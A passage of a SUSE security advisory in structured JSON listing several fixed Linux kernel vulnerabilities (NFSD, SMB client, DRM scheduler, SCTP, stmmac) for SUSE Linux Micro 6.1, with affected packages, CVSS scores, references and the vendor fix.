"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40323"
},
{
"cve": "CVE-2025-40324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40324"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: Fix crash in nfsd4_read_release()\n\nWhen tracing is enabled, the trace_nfsd_read_done trace point\ncrashes during the pynfs read.testNoFh test.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40324",
"url": "https://www.suse.com/security/cve/CVE-2025-40324"
},
{
"category": "external",
"summary": "SUSE Bug 1254791 for CVE-2025-40324",
"url": "https://bugzilla.suse.com/1254791"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40324"
},
{
"cve": "CVE-2025-40328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in smb2_close_cached_fid()\n\nfind_or_create_cached_dir() could grab a new reference after kref_put()\nhad seen the refcount drop to zero but before cfid_list_lock is acquired\nin smb2_close_cached_fid(), leading to use-after-free.\n\nSwitch to kref_put_lock() so cfid_release() is called with\ncfid_list_lock held, closing that gap.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40328",
"url": "https://www.suse.com/security/cve/CVE-2025-40328"
},
{
"category": "external",
"summary": "SUSE Bug 1254624 for CVE-2025-40328",
"url": "https://bugzilla.suse.com/1254624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40328"
},
{
"cve": "CVE-2025-40329",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40329"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sched: Fix deadlock in drm_sched_entity_kill_jobs_cb\n\nThe Mesa issue referenced below pointed out a possible deadlock:\n\n[ 1231.611031] Possible interrupt unsafe locking scenario:\n\n[ 1231.611033] CPU0 CPU1\n[ 1231.611034] ---- ----\n[ 1231.611035] lock(\u0026xa-\u003exa_lock#17);\n[ 1231.611038] local_irq_disable();\n[ 1231.611039] lock(\u0026fence-\u003elock);\n[ 1231.611041] lock(\u0026xa-\u003exa_lock#17);\n[ 1231.611044] \u003cInterrupt\u003e\n[ 1231.611045] lock(\u0026fence-\u003elock);\n[ 1231.611047]\n *** DEADLOCK ***\n\nIn this example, CPU0 would be any function accessing job-\u003edependencies\nthrough the xa_* functions that don\u0027t disable interrupts (eg:\ndrm_sched_job_add_dependency(), drm_sched_entity_kill_jobs_cb()).\n\nCPU1 is executing drm_sched_entity_kill_jobs_cb() as a fence signalling\ncallback so in an interrupt context. It will deadlock when trying to\ngrab the xa_lock which is already held by CPU0.\n\nReplacing all xa_* usage by their xa_*_irq counterparts would fix\nthis issue, but Christian pointed out another issue: dma_fence_signal\ntakes fence.lock and so does dma_fence_add_callback.\n\n dma_fence_signal() // locks f1.lock\n -\u003e drm_sched_entity_kill_jobs_cb()\n -\u003e foreach dependencies\n -\u003e dma_fence_add_callback() // locks f2.lock\n\nThis will deadlock if f1 and f2 share the same spinlock.\n\nTo fix both issues, the code iterating on dependencies and re-arming them\nis moved out to drm_sched_entity_kill_jobs_work().\n\n[phasta: commit message nits]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40329",
"url": "https://www.suse.com/security/cve/CVE-2025-40329"
},
{
"category": "external",
"summary": "SUSE Bug 1254621 for CVE-2025-40329",
"url": "https://bugzilla.suse.com/1254621"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40329"
},
{
"cve": "CVE-2025-40331",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40331"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsctp: Prevent TOCTOU out-of-bounds write\n\nFor the following path not holding the sock lock,\n\n sctp_diag_dump() -\u003e sctp_for_each_endpoint() -\u003e sctp_ep_dump()\n\nmake sure not to exceed bounds in case the address list has grown\nbetween buffer allocation (time-of-check) and write (time-of-use).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40331",
"url": "https://www.suse.com/security/cve/CVE-2025-40331"
},
{
"category": "external",
"summary": "SUSE Bug 1254615 for CVE-2025-40331",
"url": "https://bugzilla.suse.com/1254615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40331"
},
{
"cve": "CVE-2025-40337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: Correctly handle Rx checksum offload errors\n\nThe stmmac_rx function would previously set skb-\u003eip_summed to\nCHECKSUM_UNNECESSARY if hardware checksum offload (CoE) was enabled\nand the packet was of a known IP ethertype.\n\nHowever, this logic failed to check if the hardware had actually\nreported a checksum error. The hardware status, indicating a header or\npayload checksum failure, was being ignored at this stage. This could\ncause corrupt packets to be passed up the network stack as valid.\n\nThis patch corrects the logic by checking the `csum_none` status flag,\nwhich is set when the hardware reports a checksum error. If this flag\nis set, skb-\u003eip_summed is now correctly set to CHECKSUM_NONE,\nensuring the kernel\u0027s network stack will perform its own validation and\nproperly handle the corrupt packet.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40337",
"url": "https://www.suse.com/security/cve/CVE-2025-40337"
},
{
"category": "external",
"summary": "SUSE Bug 1255081 for CVE-2025-40337",
"url": "https://bugzilla.suse.com/1255081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
